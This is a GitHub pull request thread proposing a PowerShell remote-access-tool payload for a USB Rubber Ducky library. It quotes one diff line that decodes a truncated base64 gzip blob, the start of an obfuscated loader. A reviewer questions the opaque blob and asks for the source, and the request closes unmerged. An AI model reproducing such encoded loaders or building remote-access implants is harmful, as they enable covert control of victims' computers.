New Payload - R.A.T
hak5/usbrubberducky-payloads pull request #429
Opened 2024-01-08 21:01 UTC by cribb-it

2024-05-22 01:40 UTC, hak5peaks requested changes

2024-05-22 01:40 UTC, hak5peaks commented on payloads/library/execution/Win_PoSH_RAT/R.ps1
> +$I = New-Object System.IO.MemoryStream(,[Convert]::FromBase64String('H4sIAAAAAAAEAOVca49kRXL9K1ftr77VmZFvxIzEjs3a0rC2GNZr+VtvUTAtarpRVwMDv97nnMhb/bCxgJXZRTuI7lt1781HZGTEiROR/eGfrm8+v/1uef/ueHN6cfH2/v
Please either provide the source or explain how this base64 is derived.

2024-05-22 01:40 UTC, hak5peaks commented on payloads/library/execution/Win_PoSH_RAT/readme.md
> +- Category: Remote Access
Please put this inside the correct payload directory. 

`/payloads/library/remote_access`

2025-02-26 11:06 UTC, cribb-it commented
So long and thanks for all the fish!

2025-02-26 11:06 UTC, closed without merging